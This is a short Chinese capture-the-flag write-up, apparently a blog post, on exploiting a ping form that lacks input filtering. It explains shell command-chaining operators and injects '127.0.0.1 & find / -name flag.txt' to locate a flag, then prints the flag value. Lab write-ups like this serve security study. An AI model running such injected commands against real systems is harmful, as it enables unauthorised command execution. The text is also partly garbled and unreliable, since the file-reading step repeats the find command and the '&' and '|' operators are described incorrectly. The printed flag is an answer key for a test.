题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
command_execution: 命令执行。。。。漏洞
windows或linux下命令执行
command1 & command2 :不管command1执行成功与否,都会执行command2(将上一个命令的输出作为下一个命令的输入),也就是command1和command2都执行
command1 && command2 :先执行command1执行成功后才会执行command2,若command1执行失败,则不执行command2
command1 | command2 :只执行command2
command1 || command2 :command1执行失败,再执行command2(若command1执行成功,就不再执行command2)
解:
一打开就是这样一个,可以执行ping命令的界面
先试试,ping本地,ping 127.0.0.1
因为前面flag文件名都是flag.txt, 所以使用命令127.0.0.1 & find / -name flag.txt
得到flag.txt的路径为:/home/flag.txt
接下来就是打开flag.txt文件了,使用命令
127.0.0.1 & find / -name flag.txt
最后得到flag:cyberpeace{6eee8acfa26ebcfe543fe7014eea2569}
声明:
本文仅限于大家技术交流和学习,严谨读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,
作者创作不容易,请大家点赞支持一下。谢谢各位读者大老爷。